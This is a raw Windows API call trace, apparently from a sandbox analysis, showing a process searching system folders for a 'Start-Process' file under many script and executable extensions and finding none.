	[0058.169] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Process.BAT", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.169] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.170] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.170] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0058.170] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.170] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.170] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Process.CMD", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Process.CMD", lpFilePart=0x0) returned 0x1c
	[0058.170] GetFullPathNameW (in: lpFileName="Start-Process.CMD", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.CMD", lpFilePart=0x0) returned 0x2b
	[0058.170] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Process.CMD", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.170] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.170] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.170] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.170] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.170] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0058.170] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.170] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.171] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Process.VBS", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Process.VBS", lpFilePart=0x0) returned 0x1c
	[0058.171] GetFullPathNameW (in: lpFileName="Start-Process.VBS", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.VBS", lpFilePart=0x0) returned 0x2b
	[0058.171] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Process.VBS", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.171] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.171] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.171] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.171] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.171] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0058.171] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.171] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.171] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Process.VBE", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Process.VBE", lpFilePart=0x0) returned 0x1c
	[0058.171] GetFullPathNameW (in: lpFileName="Start-Process.VBE", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.VBE", lpFilePart=0x0) returned 0x2b
	[0058.172] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Process.VBE", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.172] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.172] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.172] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0058.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.172] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.172] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Process.JS", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Process.JS", lpFilePart=0x0) returned 0x1b
	[0058.172] GetFullPathNameW (in: lpFileName="Start-Process.JS", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.JS", lpFilePart=0x0) returned 0x2a
	[0058.172] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Process.JS", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.173] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.173] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.173] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0058.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.173] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.173] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Process.JSE", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Process.JSE", lpFilePart=0x0) returned 0x1c
	[0058.173] GetFullPathNameW (in: lpFileName="Start-Process.JSE", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.JSE", lpFilePart=0x0) returned 0x2b
	[0058.173] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Process.JSE", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.173] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.173] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.173] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0058.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.174] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.174] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Process.WSF", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Process.WSF", lpFilePart=0x0) returned 0x1c
	[0058.174] GetFullPathNameW (in: lpFileName="Start-Process.WSF", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.WSF", lpFilePart=0x0) returned 0x2b
	[0058.174] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Process.WSF", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.174] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.174] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.174] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0058.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.174] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.174] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Process.WSH", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Process.WSH", lpFilePart=0x0) returned 0x1c
	[0058.175] GetFullPathNameW (in: lpFileName="Start-Process.WSH", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.WSH", lpFilePart=0x0) returned 0x2b
	[0058.175] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Process.WSH", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.175] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.175] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.175] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0058.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.175] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.175] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Process.MSC", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Process.MSC", lpFilePart=0x0) returned 0x1c
	[0058.175] GetFullPathNameW (in: lpFileName="Start-Process.MSC", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.MSC", lpFilePart=0x0) returned 0x2b
	[0058.175] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Process.MSC", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.176] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.176] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.176] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0058.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.176] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.176] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Process.CPL", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Process.CPL", lpFilePart=0x0) returned 0x1c
	[0058.176] GetFullPathNameW (in: lpFileName="Start-Process.CPL", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.CPL", lpFilePart=0x0) returned 0x2b
	[0058.176] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Process.CPL", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.176] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.177] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.177] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0058.177] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.177] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.177] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Process", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Process", lpFilePart=0x0) returned 0x18
	[0058.177] GetFullPathNameW (in: lpFileName="Start-Process", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process", lpFilePart=0x0) returned 0x27
	[0058.177] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Process", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.177] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.177] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.177] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.177] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0058.177] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.177] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.ps1", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Process.ps1", lpFilePart=0x0) returned 0x2a
	[0058.178] GetFullPathNameW (in: lpFileName="Start-Process.ps1", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.ps1", lpFilePart=0x0) returned 0x2b
	[0058.178] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.ps1", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.178] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.178] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0058.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.178] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.psm1", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Process.psm1", lpFilePart=0x0) returned 0x2b
	[0058.178] GetFullPathNameW (in: lpFileName="Start-Process.psm1", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.psm1", lpFilePart=0x0) returned 0x2c
	[0058.178] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.psm1", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.179] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0058.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0058.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.psd1", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Process.psd1", lpFilePart=0x0) returned 0x2b
	[0058.179] GetFullPathNameW (in: lpFileName="Start-Process.psd1", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.psd1", lpFilePart=0x0) returned 0x2c
	[0058.179] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Process.psd1", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
